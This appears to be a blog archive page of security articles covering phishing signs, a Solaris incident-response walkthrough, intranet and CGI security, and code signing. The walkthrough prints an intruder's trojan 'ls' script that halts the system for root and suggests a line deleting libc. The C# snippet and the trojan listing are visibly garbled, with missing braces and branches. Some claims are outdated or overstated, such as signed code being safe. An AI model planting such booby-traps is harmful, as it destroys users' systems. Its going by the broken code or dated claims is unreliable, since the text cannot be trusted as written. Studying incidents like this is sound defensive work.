How to spot a phishing email

Phishing and spoof emails aim to obtain your secure information, passwords, or account numbers. These emails use deceptive means to try and trick you, like forging the sender’s address. Often, they ask for the reader to reply, call a phone number, or click on a weblink to steal personal information.


1. The email has improper spelling or grammar
This is one of the most common signs that an email isn’t legitimate. Sometimes, the mistake is easy to spot, such as ‘Dear eBay Costumer’ instead of ‘Dear eBay Customer.’

Others might be more difficult to spot, so make sure to look at the email in closer detail. For example, the subject line or the email itself might say “Health coverage for the unemployeed.” The word unemployed isn’t exactly difficult to spell. And any legitimate organizations would have editors who review their marketing emails carefully before sending it out. So when in doubt, check the email closely for misspellings and improper grammar. Continue reading “How to spot a phishing email”

Cyber Security

Cyber security is definitely one of those areas where you need to evaluate the validity of any information you find online before accepting it. The figures about the prevalence and under reporting of cyber attacks comes from a 2010 CyberSecurity Watch survey carried out in the US by a number of organisations, including the US Computer Emergency Response Team. The survey states that ‘the public may not be aware of the number of incidents because almost three-quarters (72%), on average, of the insider incidents are handled internally without legal action or the involvement of law enforcement.’ Continue reading “Cyber Security”

401 Unauthorized Request workaround when using HttpWebRequest

If you ever encountered the dreaded “401 unauthorized” error when trying to get the HTML code from a URL on the same domain due to the user from the application pool being different from the user logged in (windows authentication), this short snippet will show you how to work around this issue:

System.Net.HttpWebRequest request = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(url);
                request.Credentials = System.Net.CredentialCache.DefaultCredentials;
                request.AuthenticationLevel = System.Net.Security.AuthenticationLevel.MutualAuthRequested;
                System.Net.HttpWebResponse response  = (System.Net.HttpWebResponse)request.GetResponse();

                if (response.StatusCode == System.Net.HttpStatusCode.OK)
                    System.IO.Stream receiveStream = response.GetResponseStream();
                    System.IO.StreamReader readStream = null;

                    if (response.CharacterSet == null)
                        readStream = new System.IO.StreamReader(receiveStream);
                        readStream = new System.IO.StreamReader(receiveStream, Encoding.GetEncoding(response.CharacterSet));

                    string data = readStream.ReadToEnd();

Hacked: Now What?

HackedYou have that funny feeling that something is not right. One of your admins reported that his Unix box keeps rebooting in OpenWindows. You sit down at the box, type some commands, and wham, it reboots again. This doesn’t look like a bug, you’ve been hacked! Now what do you do?

How to Prepare.

Protecting your systems is only a part of information security. Preparing for the inevitable is another. Sooner or later, one of your systems will be compromised. What then? Backups are one critical part of recovery (nothing beats a total restore), however this should be considered as a last resort.

Here we will be discussing the knowledge and tools necessary to identify a compromised system, ascertain the hack, and recover the system, without a full restore. The first part of this article will cover tools and preparations you should make now. The second part will be a step by step example using these preparations. Although this article is by no means exhaustive, I hope to give you some basic ideas of where to start. For more information, a great place to start is


Logging is one of your most powerful tools in recovering from a security incident, logs are your friends. With extensive logging, you can potentially track the intruder’s actions, identify what has been compromised, and fix the system. Your goal is to cover various sources of logging, so you are not dependent on a single source of information.

The first place to start is /etc/syslog.conf. This file is the central command of logging, you control various logging functions here. At boot up, /usr/bin/syslogd reads this config. By editing this file, we can configure how the system logs.

The first thing we want to log is all inetd connections, such at telnet, ftp, rlogin, etc. to the file /var/adm/inetdlog. This way, whenever someone connects to the system, you have a log of what IP connected when.  First, create the file /var/adm/inetdlog  using the touch command. Second, add the following line to /etc/syslog.conf (make sure you use tabs, not spaces with the space bar):

daemon.notice           /var/adm/inetdlog

Now, restart the /usr/sbin/syslogd with kill HUP, this ensures logging to intedlog.  We are not done yet.  To enable this, inetd has to be running with both –s and –t parameter. In the last line of /etc/rc2.d/S72inetsvc, edit as follows:

/usr/bin/inetd –s -t

Now all inetd connections will be logged. For the -t parameter to take effect, you can either reboot the system, or  kill /usr/sbin/inetd, then manually launch /usr/sbin/inetd with the -s and -t parameter.   The only problem now is we are depending on a single source of information. If your system were compromised, the intruder could easily modify the logging on that system. To protect against this, we have all logging sent to an additional logging host, so we have two sources of logging. For this, we add an additional line to /etc/syslog.conf:

daemon.notice           @logger

For the truly paranoid, we can add one more layer of protection, have all logging output sent to printer. This way, the only way someone could compromise the logging is having physical access to the printer. For this, we add one last additional line to /etc/syslog.conf:

daemon.notice           /dev/printer

There are two other logs we want to ensure are functioning, /var/adm/sulog and /var/adm/loginlog. Sometimes, these logs are not enabled by default. Sulog logs all su attempts, regardless if they are successful or not. Loginlog logs all login attempts that fail 5 consecutive times. Both logs can be enabled by touching the following two files:


The last step for logging is permissions. Solaris (even 2.6) has the nasty habit of setting bad permissions in /var/adm. Bad in that most logs can be read by everyone, and some can even be written by everyone. Keep in mind that /var/adm/loginglog and /var/adm/log/asppp.log keep passwords in plaintext. The best thing to do is chmod 750 * in /var/adm


This will be our second tool for dealing with a compromised system. When you access a compromised system, you can’t rely on the environment, or the files. The intruder most likely altered both. To protect yourself, create a floppy (or CDROM) that contains critical executables. These are the executables you will be using the future. The first thing you do on a compromised system is set your $PATH to the floppy, that way you are absolutely sure you are executing uncorrupted files. Examples of critical executables would include:

/usr/bin/ls           /usr/bin/grep
/usr/bin/find         /usr/bin/more
/usr/bin/truss        /usr/bin/vi

Also, keep a printout of all files suid 4000 and all hidden files (.*) on the floppy. This way you can determine if any new hidden or suid files have been added to the compromised system.

Now What?

Now, back to that system that kept rebooting in OpenWindows. If you remember, one of your admins reported his/her system is rebooting randomly in OpenWindows, specifically if you are root. You decide to verify for yourself. You reboot, go into OpenWindows, and do nothing: nothing happens after 10 minutes of staring at the screen. You decide to look around. After typing some basic commands, wham, the system reboots. Yep, this does not look like a bug, you have been hacked AND booby trapped. NOW WHAT? Here is an example of one possible option for troubleshooting the system.

Being the ever diligent admin, you already read an article similar to this, so you have both logs and floppy ready. So, where do we start? Logs are a great place to start, but first, never trust the environment, assume that the intruder has changed it (he/she probably already has).

You reboot the system, but escape out of openwindows starting up. You mount your handy floppy, set the path so it points ONLY to it, and then confirm your environment with the #env command. This way you know that you are executing trusted files. We are now ready to start investigating the system.

You decide to start with basic checks of critical files. You begin with the command

find / -user root -perm -4000 –print

You compare all the suid files to the ones on your floppy. Everything checks out, there are no new suid files. Now lets see if any new hidden files have been added. You then try:

find / -name “.. ” -print &
find / -name “.*” –print

No, everything checks out, there have been no new hidden or suid root files added. You decide to move on to the log files, specifically /var/adm/messages, again, nothing suspicious. So far everything checks out. You decide to get daring and try out the binaries on the system, again nothing. The system seems to be working just fine, as long as you are not in openwindows.

You decide to recreate the problem, you launch OpenWindows. From OpenWindows, you start poking around without using your floppy, then wham, it reboots! Aha, progress, the system reboots, but only when you use the system binaries while in OpenWindows. As the system reboots again you once again cancel out of OpenWindows. You reset your environment back to the floppy. You decide to try OpenWindows again, except this time we will use our buddy truss (we can trust truss since we are using our floppy).

#truss –f –t exec –o /var/adm/truss /usr/openwin/bin/openwin

You go into OpenWindows, and start poking around in the OpenWindows env. Wham, sure enough, the systems reboots, but you have the culprit with truss! After the reboot, using your floppy, you cat your truss file located at /var/adm/truss. Aha, you find the culprit in the end of the truss file, the system is executing halt.

So, you have found the hack, you are executing halt in OpenWindows. The system has been booby trapped, but how? For one last time, you launch openwin, from there you take a look at the environment. You notice that your path has changed, /usr/openwin/bin has been added to the beginning of the path. Any commands you execute will start there. Now you remember, openwin adds itself to the beginning of your path by default!

Using our trusted binaries by setting $PATH to our floppy, we cruise over to /usr/openwin/bin. You do a grep for “halt”, sure enough, you found the hack. The intruder has left a booby trap. He/she created a new file, /usr/openwin/bin/ls (see Listing A)

Now, lets find out who did it, this is where our logging comes in! The first log we want to look at is /var/adm/inetdlog. Here we find, by IP address, all the users that have connected to the server. We are looking for any IP addresses that should not be there, potentially with the same time/date stamp of /usr/openwin/bin/ls. Sure enough, you find an IP that looks suspicious, Now, lets find out what that users login was. With the suspicious IP addresses, you can map the intruder’s login to the IP with the “last” command, and then pipe it into grep for the IP address.

Sure enough, you got him, but what concerns you is its the login of one of your admins. You take a look at /var/adm/loginlog, but there are no failed attempts. It looks like the intruder knew the password for the login ahead of time. You take a look at /var/adm/sulog, once again, there are no failed attempts, this user didn’t have to guess any passwords. It looks like on of your admins has been careless with his/her passwords. How you handle this problem is for another article.

There are a variety of other tools and techniques to use, such as checksums, Tripwire, etc. The ideas mentioned here are just the first step in that preparation. To learn more, check out

#cat /usr/openwin/bin/ls
if [“$LOGNAME” = “root”]

(sleep 5; /sbin/halt) & > /dev/null 2>&1else
A basic script that ruins your day. Imagine if rm /usr/lib/libc* was in there!


Website Security – Confidential Information?

corporate_confidentialSecurity doesn’t seem to be such a major issue on a corporate intranet as it is on the public Internet. After all, this network is not public. But business considerations can make security an important issue with which to deal.

If security on an intranet is centralized, it is usually controlled by a corporate organization. Many corporations currently do not have centralized security for their intranets, which is unfortunate as much of the hacking done today occurs on private rather than public networks.

If your corporation does have central control of intranet security, those in charge will have security standards that your application must meet before you can place it on the intranet. As with other corporate organizations, you will probably have to plan in advance to work with the corporate security department. Some intranets might even use centrally administered security for logon passwords and other security issues.

Most technicians find that security concerns often conflict with the technical considerations of their applications. Technical advances often outstrip the security department’s ability to accommodate them. You might devote your time to security modules that seem overly burdensome and might find that you are unable to implement some technologies on the intranet because of security requirements and concerns. But by planning ahead, you can prepare time in your design and construction schedules to accommodate these security needs.

Protecting Confidential Material

Another concern in intranet applications is protecting confidential material. It is true that your application is operating over corporate resources, but it can pass data that should not be seen by unauthorized employees, contractors, customers, and others who have access to the intranet. Many confidentiality issues discussed in Chapter 1 for the Internet also can be applied to intranet applications. Because the intranet and Internet are both TCP/IP networks, they have the same limitations and problems when plain text is transmitted across them.

One issue that requires a balancing act is the need for confidentiality versus the availability of information for the corporate community. Security and confidentiality issues are always cost-benefit tradeoffs.

Remember also that you might have to apply local, state, and even national laws to the information in your application even though it passes over your private intranet. Personnel and financial applications are often subject to these laws. Another interesting consideration that spans political jurisdictions-states, provinces, or even countries-is that various segments of the intranet might be subject to different laws when it comes to the confidentiality of the information carried on them.

Security Versus Availability

Maintaining security and confidentiality is a juggling act. On one side is the need to keep information secure and confidential, and on the other side is the need to make information available. There are no hard-and-fast rules for managing this dilemma. You could write an entire book on security and confidentiality issues. In a single chapter, I can provide only some guidelines by which you can develop your application.

You will need to examine two things to determine the level of security that your application requires. First, determine how sensitive your data is. Some data is easy. For example, if you are developing an organization chart application that will display information about your employees such as social security numbers, home addresses, and phone numbers, you are dealing with sensitive information that should be protected from unauthorized access. Other information is more subtle. Let’s say you’re working on a marketing application that will enable your managers and sales representatives to share information about current and potential customers. You might think that this information doesn’t need to be very tightly secured; after all, this is your internal network-your intranet. This brings us to the second consideration in the security versus availability dilemma.

Stop for a moment to consider the people who have access to your intranet. If you are part of a company of any size, you probably have all sorts of people in your intranet:

  • Employees
  • Temporary help
  • Consultants and vendors
  • Customers

Would you want all of these people to look at your data? Even subtle data can have an impact on your business. Let’s say you want to put your company newsletter online. Along with those announcements of company activities, the local bowling league scores, and the picture of the employee of the month is an article about your marketing strategy. If consultants, vendors, or customers had access to this information, it could give them (or their other customers) a competitive advantage in the future.

If your intranet has a mix of people on it, consider giving non-employees IDs that are easily identified, perhaps with special characters in certain positions. Secure all confidential or potentially damaging information with secured Web servers. Require access via ID and password. Your application can detect the special IDs and deny access to the information.

One interesting fact is that very few corporations have implemented internal firewalls on their intranets. You might consider implementing a firewall, especially if you are designing a sensitive divisional or departmental application that needs to be isolated from other divisions or departments.

How do you decide the security issues? Only you can do so. Look at the data, and then give some thought about the people who are using your intranet. If you have any doubt, secure the information. A few tips follow.

  • If you have any doubt about the security if your intranet, run your application on a secure server and pass information only to users with secure browsers to ensure that your sensitive information will not travel over your network as plain text.
  • Develop a central security system that can identify the various types of users by user ID and password.
  • Accept connections only from known, secure IP addresses. Make sure that machines that are accessible to unauthorized personnel cannot access your application. Use filters on your router, if appropriate, or refuse to send pages from your server to unknown IP addresses.

Change Passwords Periodically

Given a choice, most of us would select a password that was easy to remember, never change it, and use the same password everywhere. Your corporate security group probably has standards much stricter than that-for a reason. Easy passwords that never change are easy to crack, and once passwords are cracked, hackers can use them again and again.

Never send passwords via electronic mail unless the message is heavily encrypted. In fact, just to be safe, never send passwords through electronic mail, period!

If you must use passwords in your application, change them periodically. Once a month is typical, though your application might require more or less frequent changes. If you use the HTTP password capability, you will want a separate process for updating passwords. One way is to use corporate security files to obtain passwords. Another suggestion is to alter the passwords periodically yourself and distribute them to your users via a secure mechanism. Never send passwords in an electronic mail message unless the message is encrypted!

Making Secure Scripts for your Website


When you are programming on the Internet, never skip security. People really do crack Internet systems. If you are on the Internet long enough, someone will try to break into your system. Even the U.S. Department of Justice has had its Web site broken into. By taking appropriate steps to secure your systems and your programs, you (hopefully) will be able to avoid break-ins. Take the word of experience: The time spent up front is well worth it. A single security incident can easily eat up weeks of your time and potentially even millions of dollars if your systems are critical or have confidential information.

If setting up security is going to take an insane amount of time and money, you need to do a risk assessment to determine whether you should go ahead and do it. In a risk assessment, you look at the likelihood of a security breach and the cost of such a breach to your organization-remembering to include indirect factors such as loss of trust by your clients and related lost business-versus the cost of securing your system. Often, this analysis makes the answer obvious.

No security system is ever 100 percent secure. This doesn’t mean that you should just give up on security. Your goal is to secure your system by spending less money on security than a break-in would cost to fix.

People might try to break into your system or program for a variety of reasons. Some do it for fun. Others, unfortunately, do it to steal information or damage your machines. Therefore, security is almost always important. This is especially true of your Internet programs. Because they are likely one of the first things that will be attacked, spend some time thinking about the security implications of any code you are going to deploy. If you are an Internet novice, show your design and code to an Internet expert to have him verify that your program appears to be secure.

You need to remember that your Internet programs should try to deal with security on other fronts. In particular, do your best to defend against attacks from the other employees at your workplace. More security breaches are caused by employees than by crackers out on the Internet. Though you think you can trust your co-workers, keep the number of people who have access to bypass the security mechanisms to an absolute minimum. This strategy improves security and accountability.

General Internet Security

When you look at Internet security, you must look from the bottom of the protocol stack (the physical wire) all the way up to end-user applications. Any level can be attacked; therefore, every level needs some security mechanisms in place. This section mainly covers the potential weaknesses of the security mechanisms, so that you can be expecting them and possibly can deal with them in your Internet programs.

hackerOne common kind of Internet attack is to eavesdrop on packets as they cross the network, whether on the Internet or your local LAN. Networking people use the term sniffing instead of eavesdropping, however. Just about any computer can be turned into a sniffing device. The scariest thing is that any cracker who becomes root on your UNIX systems can use your UNIX box from her remote cracking site to see packets on your network. By doing this, she can gain more passwords to get into even more machines.


You will notice that the word cracker is used instead of hacker. The term hacker has two meanings. Originally, it was (and still is in many circles) a positive term, meaning “someone who plays with the internal workings of a system.” The media then came along and twisted it to mean “someone who breaks into computer systems.” Many people have recommended the term cracker for the second definition. It’s a good fit, as a safe cracker is comparable to a computer cracker.

Besides preventing the cracker from getting root on your system, you can do a few things to minimize the threat of this attack:

  • Don’t use Ethernet networks for your LAN if security is your number one goal because eavesdropping on an Ethernet is easy to do. However, Ethernet is a very good, inexpensive technology for LANs in general.
  • If you do use Ethernet, the best thing to do from a security standpoint is to use switching hubs instead of repeated hubs. The advantage is that a single machine on a switched hub doesn’t see traffic on the network that isn’t supposed to go to that machine.
  • The final approach is to encrypt traffic as it goes across your LAN or the Internet. This is very labor-intensive and shouldn’t be done lightly. (You will learn much more about encryption later in this chapter.)

One organization that can potentially help you is CERT (Computer Emergency Response Team). CERT makes announcements about what bugs exist in Internet-related software and where to acquire patches to solve the bug problems. If patches aren’t available, it usually at least suggests some workarounds. It also maintains some security tools on its FTP site. You might want to take a look before starting on Internet programming to make sure that the tools you use in your development are secure. Its URL is

Web Security

The Web can be fairly secure, completely insecure, or anywhere in between, depending on how it’s configured. Because different Web servers have different security mechanisms, the types of Web security available can range widely from system to system. Most of the popular Web servers (for example, NCSA, Apache, and Netscape Communications/Commerce Server) offer reasonably good security if configured correctly.

One of the security options controls whether someone can upload files via the PUT command. I strongly recommend turning off PUT unless you absolutely need it and fully understand what it’s doing. You can still get information via the Common Gateway Interface (CGI). CGI is another optional feature to which you might want to restrict access on the server. Poorly written CGI programs can create large security holes, as discussed later in this chapter.

If you need advanced security, you can run one of the Web servers that offers encryption capabilities, such as the Apache/SSL, Open Market Secure Web Server, NCSA, or Netscape FastTrack Server. It won’t solve all of your security problems, but it definitely can help, especially against packet sniffing attacks.

General Programming Security

Over the 20-plus years that the Internet has been in existence, many security bugs have arisen in Internet programs. The same types of security bugs, however, tend to crop up over and over again.

Preventing Buffer Overflow

The most common bug in Internet programs involves buffers. Internet programs must be prepared to accept input of any length; the mistake that programmers commonly make is to assume that the input has a maximum length and then write it into a fixed-length buffer when the input exceeds that maximum length. Even this can be stopped automatically if your compiler inserts code into the executable to make sure that the buffer (array) boundaries aren’t crossed. However, in C, the traditional Internet programming language, array boundaries aren’t checked.

A cracker can exploit this problem by overwriting the buffer. The excess input then can overwrite the program that exists beyond the end of the buffer. By this overwriting, the cracker then can have the target system execute his own code. The hard part of this attack for the cracker is that he must change his attack for every different type of machine, if not every version of a particular operating system.

To prevent this problem, you must make sure that your buffers don’t overflow under any circumstance. The first solution is to always dynamically allocate your buffers as needed. Some languages (for example, Perl) can automatically do this for you. Another approach is to look at the size of the input; if it’s too long, you treat it as an error or you truncate it. Each of these methods works if implemented correctly, but you need to decide which is the best method for your application.

Preventing Shell Command Attacks

Another common mistake is to allow a cracker to send commands to a shell. This problem occurs when the program accepts some input and then uses it in a shell command without performing adequate checking. On UNIX, it’s absolutely critical to eliminate some special characters, such as backticks (`) and quotes (“). The characters in UNIX that are safe to pass to a shell are all alphanumeric: underscore (_), minus (-), plus (+), space, tab, forward slash (/), at (@), and percent (%). For DOS and other systems, a different set of characters might be valid. In the CGI section of this chapter, I come back to this security problem and explain some ways to solve it for CGI programs.

Changing the Root Directory

One way to minimize all Internet security programming problems is to use a chrooted environment on a UNIX system to run the server program. If you are not on UNIX, this method is not possible and you might want to go on to the next section. The name comes from the chroot (change root) command in UNIX, which changes the root directory for the program. Setting up this kind of environment correctly is somewhat troublesome, but the security benefits can be huge if security is critical for your program. If a cracker does break through your program’s security, he will be in a “rubber room” environment on your system-without access to the real operating system files or anything else you don’t want to expose. This isolation will enormously reduce his ability to cause damage.

If your program works with confidential or sensitive information, it’s critical that your Internet programs can keep that information out of the hands of people who shouldn’t see it. Beyond your program’s security, you need to protect the data from access outside of your program. For example, you might have a program that receives credit card numbers. If a cracker breaks into your system and becomes root, he then can look at the file where you have stored the credit card numbers. A solution to this problem is to keep all this data encrypted whenever you store it. (Before you ignore this occurrence as being unlikely, you should know that it has already happened to a major Internet service provider.)

It is a good idea to have your program demand absolute security by keeping an audit trail; sending this audit trail to a different machine (possibly via syslog) also is advisable. With this method, if the machine that runs your program is compromised, you still have the audit trail from which to recover (as well as a backup, hopefully). Audit trails also are good for finding program bugs and abnormal use patterns, which are often a sign of compromise or attempted compromise. On the negative side, some audit trails can use an enormous amount of disk space and are hard to find useful information from.

Java Security

Java is probably the most secure of all of the Internet programming languages in existence; Java was built from the ground up to be ultra-secure. The Java security model is somewhat complex, but it incorporates security on several levels. If it were bug-free, it would be an extremely strong security mechanism that would greatly reduce worries about the security of running programs on the Internet. Unfortunately, so far a couple of bugs have been found in the security protection of the language, which would enable people to circumvent the security. The good news is that they are just bugs, not fundamental flaws in the design, and Sun is quickly addressing them. The other good news is that the bugs haven’t been exploited to cause damage.

Byte Code Verifier

The lowest level of security is the byte code verifier in the Java Interpreter, which implements the Java Virtual Machine. The byte code verifier makes sure that a Java program is valid and doesn’t perform any operations that might enable the program access to the machine underlying the interpreter. Checks performed include checking for code that will overflow or underflow the stack and code that tries to access objects that it isn’t allowed to access.

Sun is trying hard to make sure that its byte code verifier is totally secure. When other vendors release their implementations of the Java Virtual Machine, can you trust their byte code verifiers? I don’t have the answer to this question, but it’s something worth paying attention to.

The byte code verifier is invoked by the class loader (java.lang.ClassLoader). The class loader is responsible for loading classes from whatever source it needs, whether the local disk or across the network. The class loader protects a class from being replaced by another class from a less-secure source.

Security Manager

One level above the Class Loader is the Security Manager. The Security Manager implements the security policy for the running Java programs. Stand-alone Java applications can set their own security policy by overriding the Security Manager and instantiating it. Web browsers instantiate their own Security Managers, and applets aren’t allowed to modify them. Netscape Navigator, in particular, implements a very strict Security Manager. For example, accessing the local disk is impossible from any class loaded from the network. With HotJava and AppletViewer, accessing the local disk is possible for a class loaded off the network, if the user allows it.

By modifying the Security Manager, you can change the way security is handled in your applications. With the Security Manager, you can control file access. You can control where network connections can be made. You even can control access to threads through the Security Manager.

Writing your own Security Manager is a very advanced topic, worthy of a book in its own right. Needless to say, I won’t cover it here. If you need some material on writing a Security Manager, the book Tricks of the Java Programming Gurus by Sams Publishing has several chapters on how to do it.

Many people are now talking about putting digital signatures on applets (digital signatures are covered later in this chapter). With this system, you will be able to know who wrote a particular applet. Then, if you trust the author, you can relax the limits that the Security Manager imposes. Watch for this technology; it will be important to you, because you probably will need to sign your applets at some point in the future.

JavaScript Security

Although JavaScript has the word Java in it, don’t expect the same level of security from it as from Java. JavaScript originally was called LiveScript and had nothing to do with Java. The name change was almost strictly a marketing ploy on the part of Netscape.

Java offers a multilevel security model that protects Java code from doing dangerous things, but JavaScript does nothing of the sort. Netscape just tried to design a language with no dangerous commands. In Java, it’s possible to control the level of security by overwriting the Security Manager. JavaScript offers no such flexibility.

Apparently JavaScript wasn’t designed with security and privacy as primary design principles. If they were primary design principles, they were poorly implemented. People already have managed to exploit features in the language to do things such as steal URL history and forge e-mail. Netscape is gradually trying to address these problems.

To be honest, many people doubt that JavaScript will ever be completely secure because of its design. In fact, I don’t feel comfortable with it personally, and I have disabled it in my copy of Netscape Navigator.

VBScript Security

When Java and, to a lesser extent, JavaScript, burst on the scene, Microsoft had to strike back. It did so with Visual Basic Script (VBScript). Visual Basic Script is nothing more than Visual Basic with the parts that Microsoft saw as being potentially dangerous ripped out of the language. The end result is another language-from a security point of view-that’s similar to JavaScript. Whether it’s secure is somewhat of a mystery at this time, because it hasn’t been widely deployed on the Internet. Many systems seem secure until enough people try to break them. We will just have to see how VBScript holds up.

CGI Security

You can look at CGI security from several angles. I’ll cover some of the specific programming problems first and then get around to some of the more global issues related to CGI scripts later.

Handling Input to a Shell

First, go back to the passing-commands-to-a-shell problem discussed earlier. Because Perl is the most commonly used language for CGI programs, let’s look at how to fix this problem in Perl. If the input should never be used in a shell command in any way, the version of Perl known as taintperl should be used instead of normal Perl. taintperl is included with the standard Perl distribution and doesn’t enable any input to be used in a shell command unless you go through a troublesome process of untainting it first.

However, in many cases you need to use some of the input as part of a shell command. You have two choices:

  • You can write your own error-checking routines. If you do so, I would strongly recommend that you look for characters you know you can trust and then assume that anything else is an error.
  • Looking for characters you can trust is a much safer method than the second alternative-looking specifically for characters you know you can’t trust. This method isn’t as safe because you might miss one.

If you think this is too much trouble, you’re right-but you have an easy alternative. Libraries are available that check the input for you automatically, as well as parsing it into an easy-to-use format. For Perl 4, CGI-LIB is an excellent library. It’s available at the following address:

Don’t be confused by the fact that it’s included with the NCSA httpd distribution. It should work with any UNIX-based Web server and possibly any Web server supporting CGI on any platform that has Perl. For Perl 5, you can get at the following address:

CGI Scripts and userid

If you are writing CGI programs and they don’t run, the problem might be due to the security setup on your Web server. Many system administrators allow only specific people to execute CGI scripts for certain directories, to minimize the security exposure. The reason for this is that CGI scripts typically run as the userid of the Web server. A poorly written program (by any user) that can create files on the Web can cause damage to the Web server. If the Web server runs as root on UNIX or administrator on Windows NT, the damage could be even greater. It is never a good idea to run a Web server as either of these two user IDs. Anyway, if your script doesn’t run at all, talk to your Web administrator.

To solve the problem just discussed, many Web administrators install a program called CGI-WRAP. CGI-WRAP runs on a UNIX Web server and is a setuid program that performs a variety of beneficial tasks:

  • First, it runs user-written CGI scripts as that user. This scheme protects the Web server from these programs.
  • Second, it eliminates all the dangerous characters previously discussed-before the CGI script ever runs-so that the system administrator doesn’t need to worry about whether users are writing scripts in a secure fashion.
  • It also has an option to automatically kill off CGI scripts if they use too much CPU time.

If you are on a system using CGI-WRAP, you need to use different URLs, and you might need to modify your program slightly. Find some local document or talk to your Web administrator to find out how.

A common and deadly mistake that many Web administrators and programmers alike have been making recently is to place a copy of Perl itself in a directory where CGI programs can execute. A knowledgeable cracker can use this mistake to do just about anything he wants to your system. The best strategy is to always keep Perl outside any directory from which the Web server can read.

Internet Security Through Code Signing

code_signing1As you’re probably aware (and if you aren’t, you should be!), computer viruses, Trojan horses, and other assorted malicious code-nastiness pose a major security threat to networked systems. On a constantly changing and growing global network the size of the Internet, it’s simply impossible to keep viruses and their brethren at bay. The truth is, infected code of one form or another runs rampant in many systems, and code safety is a major concern for developers and for users of Internet applications (including ActiveX controls).

For example, it’s possible that a perfectly harmless-looking ActiveX control, executable file, or code from unknown sites or authors could wipe out a user’s entire system before he knew what hit him! Worse yet, perfectly harmless code created by one programmer could be tampered with and altered by some other, malicious programmer after its release, possibly wreaking havoc on the systems of users who download and execute the altered code!

Addressing Security Issues

There are two basic ways to address the Internet security issue:

  • Sandboxing. This term refers to restricting an application to a certain set of APIs, excluding those that would enable file I/O and other potentially dangerous function groups that could alter or destroy data on a user’s system. This security method assumes that you trust the application won’t do any harm, and that you trust the source of the application to not act maliciously.
  • Shrinkwrapping. This security method uses specially encrypted digital signatures. A shrinkwrapped product verifies signed code with a private-key/public-key verification scheme. Before any signed code is allowed to execute on a user’s machine, its digital signature is verified. This verification process ensures that the code hasn’t been tampered with since the code was signed, and it also ensures that the code is from a known, authenticated source.

Digital Code Signing

Digital code signatures are used to verify code authenticity and also to identify and provide details about the publisher of the code. Digital signatures are an industry standard supported by many Web browsers. Such browsers enable a user to choose whether to download and execute code of unknown or suspicious origin.


For the most up-to-date information about digital code signing, an industry standard, access the Web site for the World Wide Web Consortium (W3C) at this URL

Signed Code and Code Certificates

As an independent software vendor (ISV) who wants to use the benefits of digital code signatures in your applications, you must get something called certificates from a certificate authority (CA), a third-party company known and trusted by the industry. After a CA verifies that you comply with W3C policies, the CA issues you a digital certificate file for use in code signing. The certificate file contains important information, including the name of the software publisher, your public encryption key, the name of the CA’s certificate, and more.

Public and Private Encryption Keys

Public and private keys are created by you for use in encrypting the digital signature block used to verify your code’s authenticity. Both keys are created by you, but the private key remains your little secret. The public key must be checked by the CA to ensure that it’s unique.

Signing Your Code

You need special tools to sign your code, and these are available in the ActiveX Development Kit, available from Microsoft on CD-ROM and online at the following URL:

Fully debugged, release-ready code is run through a hash function that produces a fixed-length code digest. You then encrypt this digest with your private key and combine it with your certificate file. The result is linked back into your executable file. Presto! Your digitally signed masterpiece is ready for distribution over the Internet. The tools used for code signing are listed in Table 16.1 and are available in the ActiveX SDK.

Filename Description
MAKECERT.EXE A tool that creates a fake certificate for development purposes.
CERT2SPC.EXE The tool used to build a signature block from your certificate.
SIGNCODE.EXE A tool that links the signature block into your executable.
CHKTRUST.EXE A tool that verifies that code has been successfully signed.


Considering the Cash Factor

As you’ve seen, code signing is a robust system for creating trustworthy code. Users can rest assured that signed code is safe to download and execute. The nagging question in your mind at this point is probably, “How much does a certificate cost?” Good question!

Microsoft estimates that commercial software publishers will pay around $400 U.S. dollars for the initial certificate and around $300 for an annual renewal. Certificates for individual software publishers will ring in at about $20.